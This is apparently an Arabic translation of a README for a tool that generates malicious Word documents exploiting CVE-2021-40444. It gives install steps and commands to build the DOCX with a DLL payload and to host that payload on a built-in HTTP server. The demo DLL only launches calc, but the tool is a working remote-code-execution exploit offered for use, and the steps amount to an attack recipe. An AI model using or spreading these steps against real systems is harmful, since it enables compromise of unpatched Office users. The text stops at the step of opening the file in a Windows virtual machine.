
يولّد مستندات DOCX خبيثة تستغل CVE-2021-40444 (تنفيذ التعليمات البرمجية عن بُعد في Microsoft Office Word) مع خادم HTTP مدمج لتسليم الحمولة وتنفيذ calc القائم على DLL.
مولّد مستندات docx خبيثة لاستغلال CVE-2021-40444 (تنفيذ التعليمات البرمجية عن بُعد في Microsoft Office Word)
يعتمد إنشاء هذا السكربت على بعض الهندسة العكسية للعينة المستخدمة في الهجمات الفعلية: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (ملف docx)
تحتاج إلى تثبيت lcab أولاً (sudo apt-get install lcab)
راجع REPRODUCE.md للحصول على خطوات إعادة الإنتاج اليدوية
إذا لم يعمل ملف cab الذي تم إنشاؤه، فجرّب جعل رابط exploit.html يشير إلى calc.cab
أولاً، قم بإنشاء مستند docx خبيث باستخدام DLL، يمكنك استخدام الملف الموجود في test/calc.dll والذي يقوم فقط بتشغيل calc.exe عبر استدعاء system()
python3 exploit.py generate test/calc.dll http://<SRV IP>

بمجرد إنشاء ملف docx الخبيث (سيكون في out/)، يمكنك إعداد الخادم:
sudo python3 exploit.py host 80

أخيرًا، جرّب ملف docx في آلة افتراضية تعمل بنظام Windows:
